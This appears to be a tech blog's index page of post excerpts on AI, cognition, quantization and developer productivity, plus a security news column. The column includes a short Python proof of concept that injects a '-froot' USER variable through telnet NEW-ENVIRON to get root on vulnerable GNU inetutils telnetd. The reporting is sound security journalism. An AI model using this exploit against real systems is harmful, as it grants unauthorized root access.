Reverse-Engineering Human Cognition And Decision Making In A Modern Age

Cognitive processes are not something we generally pay much attention to until something goes wrong, yet they cover everything from ingesting sensory information, through processing and recalling it, to any decisions made as a result of such internal deliberation.

Within that context there has long been a struggle between those who feel it’s fine for humans to rely on available technologies to make tasks like information recall and calculation easier, and those who insist that a human should be perfectly capable of performing such tasks without any assistance. Plato argued that reading and writing hurt our ability to memorize, and for the longest time it was deemed inappropriate for students to even consider taking one of those newfangled digital calculators into an exam, while now we have many arguing that using an ‘AI’ is the equivalent of using a calculator.

At the root of this conundrum lies the distinction between that which enhances and that which hampers human cognition. When does one merely offload tasks to a device or object, and when does one harm one’s own cognition?

Continue reading “Reverse-Engineering Human Cognition And Decision Making In A Modern Age”

AI For The Skeptics: Pick Your Reasons To Be Excited

It’s odd being a technology writer in 2026, because around you are many people who will tell you that your craft is outdated. Like the manufacturers of buggy-whips at the turn of the twentieth century, we’re told, the automobile (in the form of large language model AI) is on the market, and our business will soon be an anachronism. Adapt or go extinct, they tell you. It’s an argument I’ve found myself facing a few times over the last year in my wandering existence, and it’s forced me to think about it. Why is everyone excited about AI, and are those reasons valid? What is there to be scared of? And what are the real reasons people should be excited about it?

If We Gotta Take This Seriously, How Can We Do It?

A couple in a horse-drawn buggy, circa 1900. The future’s looking bright in the buggy-whip department! Public domain.

I’ll start by repeating my tale from a few weeks ago when I asked readers what AI applications would survive when the hype is over. The reaction of a friend with decades of software experience on trying an AI coding helper stuck with me; she referenced her grandfather who had been born in rural America in the closing years of the nineteenth century, and recalled him describing the first time he saw an automobile. I agree with her that this has the potential to be a transformative technology, and while it’s entertaining to make fun of its shortcomings as I did three years ago when the idea of what we now call vibe coding first appeared, it’s already making itself useful in some applications. Simply dismissing it is no longer appropriate, but equally, drinking freely of the Kool-Aid seems like joining yet another hype bandwagon that will inevitably derail. A middle way has to be found. Continue reading “AI For The Skeptics: Pick Your Reasons To Be Excited”

This Week In Security: Getting Back Up To Speed

Editor’s Note: Over the course of nearly 300 posts, Jonathan Bennett set a very high bar for this column, so we knew it needed to be placed in the hands of somebody who could do it justice. That’s why we’re pleased to announce that Mike Kershaw AKA [Dragorn] will be taking over This Week In Security! Mike is a security researcher with decades of experience, a frequent contributor to 2600, and perhaps best known as the creator of the Kismet wireless scanner.

He’ll be bringing the column to you regularly going forward, but given the extended period since we last checked in with the world of (in)security, we thought it would be appropriate to kick things off with a review of some of the stories you may have missed.


Hacking like it’s 2009, or 1996

Hello all! It’s a pleasure to be here, and it already seems like a theme of the new year so far has been the return of old bugs – what’s old is new again, and 2026 has seen fixes for some increasingly ancient ones.

Telnet

Reported on the Openwall list, the GNU inetutils suite brings an update to the telnet server (yes, telnet) that closes a login bug, present since 2015, linked to environment variable sanitization.

Under the covers, the telnet daemon uses /bin/login to perform user authentication, but also has the ability to pass environment variables from the client to the host. One of these variables, USER, is passed directly to login — unfortunately this time with no checking to see what it contains. By simply passing a USER variable of “-froot”, login would accept the “-f” argument, or “treat this user as already logged in”. Instant root!
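For the curious, here’s a rough sketch of what that looks like on the wire – a hypothetical proof of concept in Python against a vulnerable telnetd, with the protocol constants taken from RFC 854 and RFC 1572 and a placeholder target address. Needless to say, only point it at systems you own:

```python
import socket

# Telnet protocol constants (RFC 854) and the NEW-ENVIRON option (RFC 1572)
IAC, SB, SE, WILL = 255, 250, 240, 251
NEW_ENVIRON = 39
IS, VAR, VALUE = 0, 0, 1

TARGET = ("192.0.2.1", 23)  # placeholder address; only test hosts you own

s = socket.create_connection(TARGET)

# Offer the NEW-ENVIRON option. A real client would wait for the server's
# DO and SEND responses before continuing; this sketch just pushes both
# messages back to back.
s.sendall(bytes([IAC, WILL, NEW_ENVIRON]))

# Claim our USER environment variable is the string "-froot". A vulnerable
# telnetd hands this to /bin/login unchecked, where it parses as the -f
# flag ("user is already authenticated") plus the username "root".
s.sendall(
    bytes([IAC, SB, NEW_ENVIRON, IS, VAR])
    + b"USER"
    + bytes([VALUE])
    + b"-froot"
    + bytes([IAC, SE])
)
```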

If this sounds vaguely familiar, it might be because the exact same bug was found in the Solaris telnetd service in 2007, down to the “-f” argument in the USER variable. An extremely similar bug targeting other variables (LD_PRELOAD) was found in the FreeBSD telnetd service in 2009, and similar historical bugs have afflicted AIX and other Unix systems in the past.

Of course, nobody in 2026 should be running a telnet service, especially not exposed to the Internet, but it’s always interesting to see the old style of bugs resurface.

Glibc

Also reported on the Openwall list, glibc – the GNU C library which underpins most binaries on Linux systems, providing kernel interfaces, file and network I/O, string manipulation, and most of the other common functions programmers expect – has killed another historical bug, present since 1996 in the DNS resolver functions, which could be used to expose locations on the stack.

Although not directly exploitable, the leak in the getnetbyaddr resolution functions could still ease the job of breaking ASLR, making other exploits viable.

Address Space Layout Randomization (ASLR) is a common method of randomizing where in memory a process and its data are loaded, making trivial exploits like buffer overflows much harder to execute. Being able to expose the location of the binary in memory by leaking stack locations weakens this mechanism, possibly exposing a vulnerable program to more traditional attacks.
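You can watch ASLR at work yourself with a few lines of Python on a Linux box – this quick sketch (unrelated to the glibc fix itself, purely an illustration) prints where libc’s printf landed in memory, and the address changes on every run:

```python
import ctypes
import ctypes.util

# Load the system C library and take the address of one of its functions.
libc = ctypes.CDLL(ctypes.util.find_library("c"))
printf_addr = ctypes.cast(libc.printf, ctypes.c_void_p).value

# With ASLR active this address changes on every run. Any bug that leaks
# a pointer like this hands an attacker the library's load address back,
# undoing the randomization.
print(hex(printf_addr))
```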

MSHTML

In February, Microsoft released fixes under CVE-2026-21513 for the MSHTML Trident renderer – the one used in Internet Explorer 5. Apparently still present in Windows, and somehow still reachable through specific shortcut links, it’s the IE5 and ActiveX gift that keeps on giving – and it’s being actively exploited.

Continue reading “This Week In Security: Getting Back Up To Speed”

Microsoft Uses Plagiarized AI Slop Flowchart To Explain How Git Works

It’s becoming something of a theme that machine-generated content – whether it’s code, text, or graphics – keeps pushing people to their limits, mostly because such ‘AI slop’ is generally of outrageously poor quality. In the case of [Vincent Driessen] there’s also a clear copyright infringement angle: he recently found that Microsoft had bastardized a Git explainer graphic which he had painstakingly made by hand in 2010, with someone at Microsoft slapping it onto a Microsoft Learn explainer article pertaining to GitHub.

As noted in a PC Gamer article on this clear faux pas, Microsoft has since quietly removed the graphic and replaced it with something possibly less sloppy, but with zero comment and so far no response to PC Gamer’s request for comment. Of course, The Internet Archive always remembers.

What’s probably most vexing is that the ripped-off diagram isn’t even particularly good, as it has all the hallmarks of AI slop graphics: from the nonsensical arrows that were added or modified, to heavily mutilated text, including ‘Time’ becoming ‘Tim’ and ‘continuously merged’ becoming ‘continvuocly morged’. This makes it obvious that whoever put the graphic on the Microsoft Learn page either didn’t bother to check it, or that no human was involved in generating said page at all.

Continue reading “Microsoft Uses Plagiarized AI Slop Flowchart To Explain How Git Works”

Why LLMs Are Less Intelligent Than Crows

The basic concept of human intelligence entails self-awareness alongside the ability to reason and apply logic to one’s actions and daily life. Despite the very fuzzy definition of ‘human intelligence’, and despite many aspects of said human intelligence (HI) also being observed among other animals, like crows and orcas, humans over the ages have always known that their brains are more special than those of other animals.

Currently the Cattell-Horn-Carroll (CHC) theory of intelligence is the most widely accepted model, defining distinct types of abilities that range from memory and processing speed to reasoning ability. While admittedly not perfect, it gives us a baseline to work with when we think of the term ‘intelligence’, whether biological or artificial.

This raises the question of how, in the context of artificial intelligence (AI), the CHC model translates to the technologies we see in use today. When can we expect to subject an artificial intelligence to an IQ test and have it handily outperform a human on all metrics?

Continue reading “Why LLMs Are Less Intelligent Than Crows”

Making The Smallest And Dumbest LLM With Extreme Quantization

Turns out that training on Twitch quotes doesn’t make an LLM a math genius. (Credit: Codeically, YouTube)

The reason why large language models are called ‘large’ is not because of how smart they are, but because of their sheer size in bytes. With billions of parameters at four bytes each, they pose a serious challenge when it comes to not just their size on disk, but also in RAM, specifically the RAM of your video card (VRAM). Reducing this immense size, as is done routinely for the smaller pretrained models one can download for local use, involves quantization. This process is explained and demonstrated by [Codeically], who takes it to its logical extreme: reducing what could be a GB-sized model down to a mere 63 MB by shrinking the bits per parameter.

While you can offload a model, i.e. keep only part of it in VRAM and the rest in system RAM, this massively impacts performance. An alternative is to use fewer bits per weight in the model through quantization, which typically involves reducing the original 32- or 16-bit floating point weights to 8-bit integers, cutting memory usage by half to three-quarters. Going lower than this is generally deemed inadvisable.
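To get a feel for what going lower means, here’s a minimal numpy sketch of symmetric 4-bit quantization – an illustration of the general technique, not [Codeically]’s actual pipeline: every weight is snapped to one of sixteen integer levels and reconstructed with a single per-tensor scale.

```python
import numpy as np

# Stand-in fp32 weight matrix; a real model has billions of these values.
w = np.random.randn(256, 256).astype(np.float32)

# Symmetric int4 quantization: signed 4-bit integers span -8..7, so pick
# a per-tensor scale that maps the largest weight magnitude onto 7.
scale = np.abs(w).max() / 7
q = np.clip(np.round(w / scale), -8, 7).astype(np.int8)

# Dequantize to see how much precision was thrown away.
w_hat = q.astype(np.float32) * scale
print("max abs error:", float(np.abs(w - w_hat).max()))

# Packed two-per-byte on disk, int4 weights take an eighth of the fp32
# footprint: the smallest GPT-2 (~124M parameters) drops from ~500 MB to
# ~62 MB, right in line with the 63 MB model here.
```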

Starting with GPT-2 as the base, [Codeically] trained it on a pile of internet quotes, then quantized the parameters down to a very anemic 4-bit integer size. After initially zeroing the weights by hand made the output too garbled, a second attempt without the zeroing produced somewhat usable output before flying off the rails. Yet it did this with a 63 MB model at 78 tokens per second on just the CPU, demonstrating that you can create a pocket-sized chatbot to spout nonsense even without splurging on expensive hardware.

Continue reading “Making The Smallest And Dumbest LLM With Extreme Quantization”

Measuring The Impact Of LLMs On Experienced Developer Productivity

Recently, AI risk and benefit evaluation company METR ran a randomized controlled trial (RCT) on a gaggle of experienced open source developers to gain objective data on how the use of LLMs affects their productivity. Their finding was that using LLM-based tools like Cursor Pro with Claude 3.5/3.7 Sonnet reduced productivity by about 19%, with the full study by [Joel Becker] et al. available as a PDF.

This study was also intended to establish a methodology to assess the impact from introducing LLM-based tools in software development. In the RCT, 16 experienced open source software developers were given 246 tasks, after which their effective performance was evaluated.

A large focus of the methodology was on creating realistic scenarios instead of canned benchmarks: the tasks included adding features, fixing bugs, and refactoring, much as the developers would do in the course of working on their respective open source projects. The observed increase in the time it took to complete tasks with an LLM’s assistance was likely due to a range of factors, including over-optimism about the tools’ capabilities, the LLM interfering with the developers’ existing knowledge of the codebase, poor LLM performance on large codebases, low reliability of the generated code, and the LLM doing very poorly with tacit knowledge and context.

Although METR suggests that this poor showing may improve over time, it seems fair to question whether LLM coding tools are a useful coding partner at all.